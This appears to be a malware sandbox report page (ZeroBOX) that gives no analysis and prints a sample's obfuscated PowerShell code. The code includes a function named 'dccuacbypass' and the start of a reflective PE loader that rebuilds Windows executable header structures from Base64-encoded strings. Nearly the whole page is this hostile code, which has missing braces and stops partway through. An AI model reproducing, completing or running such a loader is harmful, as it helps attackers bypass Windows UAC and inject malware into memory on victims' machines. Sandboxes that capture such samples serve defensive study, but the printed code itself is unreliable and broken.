popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
function dccuacbypass
function _00011001001110011
[CmdletBinding()]
Param(
[Parameter(Position = 0, Mandatory = $true)]
[ValidateNotNullOrEmpty()]
[Byte[]]
${_00000000110100000},
[Parameter(Position = 1)]
[String[]]
${_00101101101110100},
[Parameter(Position = 2)]
[ValidateSet( 'WString', 'String', 'Void' )]
[String]
${_00000001011111110} = 'Void',
[Parameter(Position = 3)]
[String]
${_01011011000001101},
[Parameter(Position = 4)]
[Int32]
${_10101000101011101},
[Parameter(Position = 5)]
[String]
${_00010101111010101},
[Switch]
${_00100110100011000},
[Switch]
${_00101011011011001}
Set-StrictMode -Version 2
${10100010000001110} = {
[CmdletBinding()]
Param(
[Parameter(Position = 0, Mandatory = $true)]
[Byte[]]
${_00000000110100000},
[Parameter(Position = 1, Mandatory = $true)]
[String]
${_00000001011111110},
[Parameter(Position = 2, Mandatory = $true)]
[Int32]
${_10101000101011101},
[Parameter(Position = 3, Mandatory = $true)]
[String]
${_00010101111010101},
[Parameter(Position = 4, Mandatory = $true)]
[Bool]
${_00100110100011000}
Function _10100111101101101
$Win32Types = New-Object System.Object
${01010101000100100} = [AppDomain]::CurrentDomain
${10010010110101001} = New-Object System.Reflection.AssemblyName($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RAB5AG4AYQBtAGkAYwBBAHMAcwBlAG0AYgBsAHkA'))))
${01011010111011001} = ${01010101000100100}.DefineDynamicAssembly(${10010010110101001}, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
${00101100111000111} = ${01011010111011001}.DefineDynamicModule($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RAB5AG4AYQBtAGkAYwBNAG8AZAB1AGwAZQA='))), $false)
${10101111111100000} = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]
${10001111001010101} = ${00101100111000111}.DefineEnum($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGMAaABpAG4AZQBUAHkAcABlAA=='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))), [UInt16])
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBhAHQAaQB2AGUA'))), [UInt16] 0) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQAzADgANgA='))), [UInt16] 0x014c) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQB0AGEAbgBpAHUAbQA='))), [UInt16] 0x0200) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('eAA2ADQA'))), [UInt16] 0x8664) | Out-Null
${10101000000111000} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value ${10101000000111000}
${10001111001010101} = ${00101100111000111}.DefineEnum($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGcAaQBjAFQAeQBwAGUA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))), [UInt16])
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ATgBUAF8ATwBQAFQASQBPAE4AQQBMAF8ASABEAFIAMwAyAF8ATQBBAEcASQBDAA=='))), [UInt16] 0x10b) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ATgBUAF8ATwBQAFQASQBPAE4AQQBMAF8ASABEAFIANgA0AF8ATQBBAEcASQBDAA=='))), [UInt16] 0x20b) | Out-Null
${10011000111111001} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value ${10011000111111001}
${10001111001010101} = ${00101100111000111}.DefineEnum($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB1AGIAUwB5AHMAdABlAG0AVAB5AHAAZQA='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))), [UInt16])
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBVAEIAUwBZAFMAVABFAE0AXwBVAE4ASwBOAE8AVwBOAA=='))), [UInt16] 0) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBVAEIAUwBZAFMAVABFAE0AXwBOAEEAVABJAFYARQA='))), [UInt16] 1) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBVAEIAUwBZAFMAVABFAE0AXwBXAEkATgBEAE8AVwBTAF8ARwBVAEkA'))), [UInt16] 2) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBVAEIAUwBZAFMAVABFAE0AXwBXAEkATgBEAE8AVwBTAF8AQwBVAEkA'))), [UInt16] 3) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBVAEIAUwBZAFMAVABFAE0AXwBQAE8AUwBJAFgAXwBDAFUASQA='))), [UInt16] 7) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBVAEIAUwBZAFMAVABFAE0AXwBXAEkATgBEAE8AVwBTAF8AQwBFAF8ARwBVAEkA'))), [UInt16] 9) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBVAEIAUwBZAFMAVABFAE0AXwBFAEYASQBfAEEAUABQAEwASQBDAEEAVABJAE8ATgA='))), [UInt16] 10) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBVAEIAUwBZAFMAVABFAE0AXwBFAEYASQBfAEIATwBPAFQAXwBTAEUAUgBWAEkAQwBFAF8ARABSAEkAVgBFAFIA'))), [UInt16] 11) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBVAEIAUwBZAFMAVABFAE0AXwBFAEYASQBfAFIAVQBOAFQASQBNAEUAXwBEAFIASQBWAEUAUgA='))), [UInt16] 12) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBVAEIAUwBZAFMAVABFAE0AXwBFAEYASQBfAFIATwBNAA=='))), [UInt16] 13) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBVAEIAUwBZAFMAVABFAE0AXwBYAEIATwBYAA=='))), [UInt16] 14) | Out-Null
${01011100100100011} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value ${01011100100100011}
${10001111001010101} = ${00101100111000111}.DefineEnum($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABsAGwAQwBoAGEAcgBhAGMAdABlAHIAaQBzAHQAaQBjAHMAVAB5AHAAZQA='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))), [UInt16])
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBFAFMAXwAwAA=='))), [UInt16] 0x0001) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBFAFMAXwAxAA=='))), [UInt16] 0x0002) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBFAFMAXwAyAA=='))), [UInt16] 0x0004) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBFAFMAXwAzAA=='))), [UInt16] 0x0008) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARABMAEwAXwBDAEgAQQBSAEEAQwBUAEUAUgBJAFMAVABJAEMAUwBfAEQAWQBOAEEATQBJAEMAXwBCAEEAUwBFAA=='))), [UInt16] 0x0040) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARABMAEwAXwBDAEgAQQBSAEEAQwBUAEUAUgBJAFMAVABJAEMAUwBfAEYATwBSAEMARQBfAEkATgBUAEUARwBSAEkAVABZAA=='))), [UInt16] 0x0080) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARABMAEwAXwBDAEgAQQBSAEEAQwBUAEUAUgBJAFMAVABJAEMAUwBfAE4AWABfAEMATwBNAFAAQQBUAA=='))), [UInt16] 0x0100) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARABMAEwAQwBIAEEAUgBBAEMAVABFAFIASQBTAFQASQBDAFMAXwBOAE8AXwBJAFMATwBMAEEAVABJAE8ATgA='))), [UInt16] 0x0200) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARABMAEwAQwBIAEEAUgBBAEMAVABFAFIASQBTAFQASQBDAFMAXwBOAE8AXwBTAEUASAA='))), [UInt16] 0x0400) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARABMAEwAQwBIAEEAUgBBAEMAVABFAFIASQBTAFQASQBDAFMAXwBOAE8AXwBCAEkATgBEAA=='))), [UInt16] 0x0800) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBFAFMAXwA0AA=='))), [UInt16] 0x1000) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARABMAEwAQwBIAEEAUgBBAEMAVABFAFIASQBTAFQASQBDAFMAXwBXAEQATQBfAEQAUgBJAFYARQBSAA=='))), [UInt16] 0x2000) | Out-Null
${10001111001010101}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARABMAEwAQwBIAEEAUgBBAEMAVABFAFIASQBTAFQASQBDAFMAXwBUAEUAUgBNAEkATgBBAEwAXwBTAEUAUgBWAEUAUgBfAEEAVwBBAFIARQA='))), [UInt16] 0x8000) | Out-Null
${01100101010001010} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value ${01100101010001010}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAEUAeABwAGwAaQBjAGkAdABMAGEAeQBvAHUAdAAsACAAUwBlAGEAbABlAGQALAAgAEIAZQBmAG8AcgBlAEYAaQBlAGwAZABJAG4AaQB0AA==')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARABBAFQAQQBfAEQASQBSAEUAQwBUAE8AUgBZAA=='))), ${01001001010001110}, [System.ValueType], 8)
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbABBAGQAZAByAGUAcwBzAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(0) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(4) | Out-Null
${00101010111001100} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value ${00101010111001100}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARgBJAEwARQBfAEgARQBBAEQARQBSAA=='))), ${01001001010001110}, [System.ValueType], 20)
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGMAaABpAG4AZQA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgB1AG0AYgBlAHIATwBmAFMAZQBjAHQAaQBvAG4AcwA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABpAG0AZQBEAGEAdABlAFMAdABhAG0AcAA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABvAGkAbgB0AGUAcgBUAG8AUwB5AG0AYgBvAGwAVABhAGIAbABlAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgB1AG0AYgBlAHIATwBmAFMAeQBtAGIAbwBsAHMA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYATwBwAHQAaQBvAG4AYQBsAEgAZQBhAGQAZQByAA=='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBoAGEAcgBhAGMAdABlAHIAaQBzAHQAaQBjAHMA'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${01000101100110000} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value ${01000101100110000}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAEUAeABwAGwAaQBjAGkAdABMAGEAeQBvAHUAdAAsACAAUwBlAGEAbABlAGQALAAgAEIAZQBmAG8AcgBlAEYAaQBlAGwAZABJAG4AaQB0AA==')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ATwBQAFQASQBPAE4AQQBMAF8ASABFAEEARABFAFIANgA0AA=='))), ${01001001010001110}, [System.ValueType], 240)
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGcAaQBjAA=='))), ${10011000111111001}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(0) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGoAbwByAEwAaQBuAGsAZQByAFYAZQByAHMAaQBvAG4A'))), [Byte], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(2) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAG4AbwByAEwAaQBuAGsAZQByAFYAZQByAHMAaQBvAG4A'))), [Byte], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(3) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYAQwBvAGQAZQA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(4) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASQBuAGkAdABpAGEAbABpAHoAZQBkAEQAYQB0AGEA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(8) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYAVQBuAGkAbgBpAHQAaQBhAGwAaQB6AGUAZABEAGEAdABhAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(12) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBkAGQAcgBlAHMAcwBPAGYARQBuAHQAcgB5AFAAbwBpAG4AdAA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(16) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QgBhAHMAZQBPAGYAQwBvAGQAZQA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(20) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBtAGEAZwBlAEIAYQBzAGUA'))), [UInt64], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(24) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAGMAdABpAG8AbgBBAGwAaQBnAG4AbQBlAG4AdAA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(32) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBpAGwAZQBBAGwAaQBnAG4AbQBlAG4AdAA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(36) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGoAbwByAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtAFYAZQByAHMAaQBvAG4A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(40) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAG4AbwByAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtAFYAZQByAHMAaQBvAG4A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(42) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGoAbwByAEkAbQBhAGcAZQBWAGUAcgBzAGkAbwBuAA=='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(44) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAG4AbwByAEkAbQBhAGcAZQBWAGUAcgBzAGkAbwBuAA=='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(46) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGoAbwByAFMAdQBiAHMAeQBzAHQAZQBtAFYAZQByAHMAaQBvAG4A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(48) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAG4AbwByAFMAdQBiAHMAeQBzAHQAZQBtAFYAZQByAHMAaQBvAG4A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(50) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBpAG4AMwAyAFYAZQByAHMAaQBvAG4AVgBhAGwAdQBlAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(52) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASQBtAGEAZwBlAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(56) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASABlAGEAZABlAHIAcwA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(60) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBoAGUAYwBrAFMAdQBtAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(64) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB1AGIAcwB5AHMAdABlAG0A'))), ${01011100100100011}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(68) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABsAGwAQwBoAGEAcgBhAGMAdABlAHIAaQBzAHQAaQBjAHMA'))), ${01100101010001010}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(70) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYAUwB0AGEAYwBrAFIAZQBzAGUAcgB2AGUA'))), [UInt64], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(72) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYAUwB0AGEAYwBrAEMAbwBtAG0AaQB0AA=='))), [UInt64], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(80) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASABlAGEAcABSAGUAcwBlAHIAdgBlAA=='))), [UInt64], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(88) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASABlAGEAcABDAG8AbQBtAGkAdAA='))), [UInt64], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(96) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABvAGEAZABlAHIARgBsAGEAZwBzAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(104) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgB1AG0AYgBlAHIATwBmAFIAdgBhAEEAbgBkAFMAaQB6AGUAcwA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(108) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQB4AHAAbwByAHQAVABhAGIAbABlAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(112) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBtAHAAbwByAHQAVABhAGIAbABlAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(120) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAHMAbwB1AHIAYwBlAFQAYQBiAGwAZQA='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(128) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQB4AGMAZQBwAHQAaQBvAG4AVABhAGIAbABlAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(136) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBlAHIAdABpAGYAaQBjAGEAdABlAFQAYQBiAGwAZQA='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(144) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QgBhAHMAZQBSAGUAbABvAGMAYQB0AGkAbwBuAFQAYQBiAGwAZQA='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(152) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABlAGIAdQBnAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(160) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQByAGMAaABpAHQAZQBjAHQAdQByAGUA'))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(168) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBsAG8AYgBhAGwAUAB0AHIA'))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(176) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABMAFMAVABhAGIAbABlAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(184) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABvAGEAZABDAG8AbgBmAGkAZwBUAGEAYgBsAGUA'))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(192) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QgBvAHUAbgBkAEkAbQBwAG8AcgB0AA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(200) | Out-Null
